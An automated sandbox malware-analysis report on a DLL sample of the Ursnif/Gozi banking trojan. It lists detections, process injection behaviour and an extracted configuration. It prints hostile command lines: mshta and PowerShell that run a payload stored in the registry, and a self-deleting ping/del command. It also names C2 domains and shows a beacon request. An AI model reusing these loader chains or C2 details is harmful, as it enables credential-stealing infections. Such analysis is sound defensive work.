
Windows Analysis Report uT9rwkGATJ.dll

Overview

General Information

Sample Name: uT9rwkGATJ.dll
Analysis ID: 499264
MD5: 9a453cc31ebfca29d8df565258fbf8ce
SHA1: 5eb3be88abb84f63e04c92bc3e35a82a01689971
SHA256: eaed947e04ed7659fbba2287e6965b2c0960035aa539b57a9f9e15504a01ca0a
Tags: dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Powershell run code from registry
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Suspicious powershell command line found
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6424 cmdline: loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6392 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6388 cmdline: rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 3548 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 6040 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6400 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5980 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5868 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 4000 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 6504 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 6856 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6972 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1304 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5452 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3912 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4452 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6088 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • cmd.exe (PID: 1460 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6372 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • mshta.exe (PID: 5772 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5480 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 344 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3380 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5640 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(table truncated; 29 entries in the full report)

Unpacked PEs

Source | Rule | Description | Author
0.2.loaddll32.exe.b00000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
4.3.rundll32.exe.4a794a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
4.3.rundll32.exe.96a309.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
0.2.loaddll32.exe.13494a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
4.3.rundll32.exe.4a794a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(table truncated; 15 entries in the full report)

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6972, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', ProcessId: 1304
Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4000, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6504
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132781743762523748.6972.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: uT9rwkGATJ.dll | Joe Sandbox ML: detected
Source: uT9rwkGATJ.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown | HTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49828 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49829 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49830 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49832 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49833 version: TLS 1.2
Source: uT9rwkGATJ.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source: Binary string: d.pdbp source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.178.98 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 193.29.104.83 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 40.101.9.178 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 40.97.160.2 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: xereunrtol.website
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: zereunrtol.website
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: global traffic | HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
